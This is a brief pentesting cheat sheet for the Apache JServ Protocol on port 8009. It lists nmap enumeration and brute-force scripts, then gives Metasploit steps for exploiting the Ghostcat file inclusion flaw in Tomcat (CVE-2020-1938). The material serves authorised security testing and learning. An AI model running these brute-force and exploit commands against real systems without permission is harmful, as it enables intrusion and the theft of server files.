AJP (Apache JServ Protocol) Pentesting

AJP is a binary protocol that can proxy inbound requests from a web server through to an application server that sits behind the web server. A default port is 8009.

Enumeration

nmap --script ajp-auth -p 8009 <target-ip>
nmap --script ajp-auth --script-args ajp-auth.path=/login -p 8009 <target-ip>
nmap --script ajp-brute -p 8009 <target-ip>
nmap --script ajp-headers -p 8009 <target-ip>
nmap --script ajp-methods -p 8009 <target-ip>
nmap --script ajp-request -p 8009 <target-ip>

Ghostcat File Inclusion

It's a vulnerability of Tomcat AJP (CVE-2020-1938).
Use Metasploit for exploiting it.

msfconsole
msf6 > use auxiliary/admin/http/tomcat_ghostcat
msf6 auxiliary(admin/http/tomcat_ghostcat) > set rhosts <target-ip>
msf6 auxiliary(admin/http/tomcat_ghostcat) > exploit